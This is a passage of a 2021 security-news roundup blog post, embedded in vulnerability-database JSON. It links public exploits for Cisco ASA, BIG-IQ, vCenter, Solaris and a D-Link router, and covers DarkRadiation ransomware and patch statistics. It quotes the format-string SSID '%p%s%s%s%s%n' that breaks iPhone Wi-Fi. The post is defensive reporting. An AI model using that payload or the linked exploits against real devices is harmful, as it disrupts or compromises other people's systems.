YouTube channel](<https://www.youtube.com/channel/UCSenC-btyVAexgSwvVtxQkg>) and my Telegram [@avleonovcom](<https://t.me/avleonovcom>).\n\nLet&#x27;s start with some new public exploits.\n\n 1. Researchers at Positive Technologies [have dropped a proof-of-concept (PoC) exploit](<https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>) on Twitter for a known cross-site scripting (XSS) vulnerability in the Cisco Adaptive Security Appliance (ASA) CVE-2020-3580. This flaw was patched in October. There are reports of researchers pursuing bug bounties using this exploit. Maybe you should do this too. Well, or at least ask your IT administrators if they have updated the ASA.\n 2. [F5 BIG-IQ VE Post-auth Remote Root RCE](<https://vulners.com/packetstorm/PACKETSTORM:163264>). BIG-IQ provides a single point of management for all your BIG-IP devices \u2014 whether they are on premises or in a public or private cloud. It was possible to execute commands with root privileges as an authenticated privileged user via command injection in easy-setup-test-connection. A good reason to check if you have this in the infrastructure. But of course the fact that this is Post-auth makes it less interesting.\n 3. [VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution](<https://vulners.com/packetstorm/PACKETSTORM:163268>). From the description of the vulnerability that was published in February 2021. &quot;The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.&quot; Therefore, if your IT colleagues have not patched vCenter since February, you can try to demonstrate how this vulnerability is exploited in practice.\n 4. [Solaris SunSSH 11.0 Remote Root](<https://vulners.com/packetstorm/PACKETSTORM:163232>). &quot;CVE-2020-14871 is a critical pre-authentication (via SSH) stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) in Oracle Solaris. PAM is a dynamic authentication component that was integrated into Solaris back in 1997 as part of Solaris 2.6&quot;. If you are still using Solaris in your infrastructure, this is a great opportunity to try this exploit.\n 5. [Dlink DSL2750U - &#x27;Reboot&#x27; Command Injection](<https://vulners.com/packetstorm/PACKETSTORM:163228>). There, in the exploit code, [there is a link to the full study](<https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20\\(firmware%20version%201.6\\)>) that shows how the researcher, Mohammed Hadi, gains admin access to the router. This is interesting considering that this router model is quite popular and you can still buy such a router.\n 6. [It&#x27;s 2021 and a printf format string in a wireless network&#x27;s name can break iPhone Wi-Fi](<https://www.theregister.com/2021/06/21/wifi_ssid_flaw/>). On Friday, Carl Schou, a security researcher in Denmark, reported that his iPhone lost its Wi-Fi capability after attempting to connect to a Wi-Fi network named &quot;%p%s%s%s%s%n&quot;. Fortunately, the damage appears not to be permanent. Apple iOS devices that lose Wi-Fi capability after being bitten by this bug can be restored via the General -&gt; Reset -&gt; Reset Network Settings menu option, which reverts network settings to their factory default. Not a very interesting vulnerability in terms of practical exploitation, but fun. Don&#x27;t connect to unfamiliar Wi-Fi networks.\n\nNow let&#x27;s see some interesting new vulnerabilities.\n\n 1. [Critical Palo Alto Cyber-Defense Bug Allows Remote \u2018War Room\u2019 Access](<https://threatpost.com/critical-palo-alto-bug-remote-war-room/167169/>). &quot;A critical security bug in Palo Alto Networks\u2019 Cortex XSOAR could allow remote attackers to run commands and automations in the Cortex XSOAR War Room and to take other actions on the platform, without having to log in. Found internally by Palo Alto, the bug (CVE-2021-3044) is an improper-authorization vulnerability that \u201cenables a remote unauthenticated attacker with network access to the Cortex XSOAR server to perform unauthorized actions through the REST API,\u201d according to the security vendor\u2019s Tuesday advisory.\n 2. [Cisco HyperFlex HX Auth Handling Remote Command Execution](<https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution>). Cisco HyperFlex HX Data Platform is a high-performance, extensible distributed file system that supports multiple hypervisors with a wide range of enterprise-grade data management and optimization services. If you have this in use, pay attention.\n 3. &quot;VMware has rolled out security updates to resolve a [critical flaw affecting Carbon Black App Control](<https://thehackernews.com/2021/06/critical-auth-bypass-bug-affects-vmware.html>) that could be exploited to bypass authentication and take control of vulnerable systems.&quot; Carbon Black Protection (Cb App Control), formerly Bit9, is an application control product that allows departments to monitor and control application execution on systems.\n 4. [NVIDIA Jetson Chipsets Found Vulnerable to High-severity Flaws](<https://thehackernews.com/2021/06/nvidia-jetson-chipsets-found-vulnerable.html>). The NVIDIA Jetson line consists of embedded Linux AI and computer vision compute modules and developer kits that primarily caters to AI-based computer vision applications and autonomous systems such as mobile robots and drones.\n 5. On June 22, SonicWall published an advisory (SNWLID-2021-0006) to address an [incomplete fix for a vulnerability in its operating system](<https://www.tenable.com/blog/cve-2021-20019-sonicwall-fixes-incomplete-patch-for-cve-2020-5135>), SonicOS, used in a variety of SonicWall network security devices, including their SSL VPNs.\n\nMalware:\n\n 1. Cybersecurity researchers are sounding the alarm bell over a new ransomware strain called [&quot;DarkRadiation&quot;](<https://thehackernews.com/2021/06/wormable-darkradiation-ransomware.html>) that&#x27;s implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control (C2) communications. &quot;The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions,&quot; researchers from Trend Micro said in a report published last week. &quot;The malware uses OpenSSL&#x27;s AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram&#x27;s API to send an infection status to the threat actor(s).&quot;\n\nSome statistics for your presentations:\n\n 1. [ Time to patch increases significantly during pandemic](<https://www.computerweekly.com/news/252502887/Time-to-patch-increases-significantly-during-pandemic>). &quot;Among some of the headline findings in the data was a sharp decrease in the frequency with which disclosed vulnerabilities are patched in under 24 hours \u2013 which dropped from 20% last year to 9.9% today \u2013 despite new vulnerabilities or zero-days being quickly exploited by malicious actors, as has been seen in many cases, even before disclosure. The survey also found that about 60% of organisations take more than 72 hours to patch, and more than 20% take over 30 days, giving malicious actors a wide-open window to take advantage of the disclosed vulnerabilities to get inside target networks, establish persistence, steal data, and drop malware or ransomware.&quot;\n 2. [&#x27;Set it and forget it&#x27; attitude to open-source software has become a major security problem, says Veracode](<https://www.theregister.com/2021/06/22/third_party_libraries_veracode/>). 92 per cent of the flaws discovered in third-party libraries could be fixed by simply updating to the latest version, with two-thirds of fixes being &quot;minor and non-disruptive to the functionality of even the most complex software applications.&quot; The report also highlighted that a slim majority, 52 per cent, of developers claimed to have a formal process for the selection of third-party libraries, with a quarter saying they are either unsure or unaware of the existence of such a process, and that &quot;security&quot; is the third biggest concern when selecting a library \u2013 with &quot;functionality&quot; and &quot;licensing&quot; topping the leader board.\n\nPromising topic:\n\n 1. Google on Thursday [introduced a unified vulnerability schema for open source projects](<https://www.theregister.com/2021/06/24/google_security_fix/>), continuing its current campaign to shore up the security of open source software. A schema defines the structure of a database. It&#x27;s a blueprint for the objects within the database and it informs how data can be queried and exchanged. As Google describes it, existing naming systems like the CPE Product Dictionary don&#x27;t provide an easy way to automatically map a CVE vulnerability listing to a package name and a set of versions in a package manager. &quot;With this schema we hope to define a format that all vulnerability databases can export.&quot; Well, let&#x27;s keep an eye on this.\n\nWell, it would probably be worth ending with the words about John McAfee.\n\n[Anti-virus Pioneer John McAfee Found Dead in Spanish Prison Cell](<https://www.infosecurity-magazine.com/news/john-mcafee-found-dead-in-prison/>). I do not presume to say anything about the crimes of which he was accused. In any case, he was an information security legend and his whole life was cooler than any Hollywood blockbuster. I recommend watching videos on [his YouTube channel](<https://www.youtube.com/user/officialjohnmcafee>) about attack attribution and the current state of infrastructure security. He said some pretty unpopular things. And some of them are very interesting. The way it ended is of course very sad and tragic. RIP. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-06-28T10:59:53", "type": "avleonov", "title": "Last Week\u2019s Security news: Cisco ASA, BIG-IQ, vSphere, Solaris, Dlink, iPhone %s, DarkRadiation, Google schema, John McAfee", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14871", "CVE-2020-3580", "CVE-2020-5135", "CVE-2021-1497", "CVE-2021-20019", "CVE-2021-3044"], "modified": "2021-06-28T10:59:53", "id": "AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9", "href": "http://feedproxy.google.com/~r/avleonov/~3/S3dBKHSK6BE/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}